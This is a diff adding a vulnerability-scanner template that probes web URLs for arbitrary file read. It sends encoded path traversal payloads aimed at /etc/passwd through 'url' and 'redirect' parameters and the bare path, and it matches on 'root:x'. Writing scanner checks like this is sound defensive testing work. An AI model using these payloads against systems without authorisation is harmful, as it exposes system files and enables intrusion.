new template

vulnerabilities/arbitrary-file-read.yaml

@@ -0,0 +1,18 @@
+id: arbitrary-file-read
+
+info:
+  name: Arbitrary File Read
+  author: Sushant Kamble (https://in.linkedin.com/in/sushantkamble)
+  severity: high
+  description: Searches for /etc/passwd on passed URLs.
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/?url=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd"
+      - "{{BaseURL}}/?redirect=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd"
+      - "{{BaseURL}}/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd"
+    matchers:
+      - type: word
+        words:
+          - "root:x"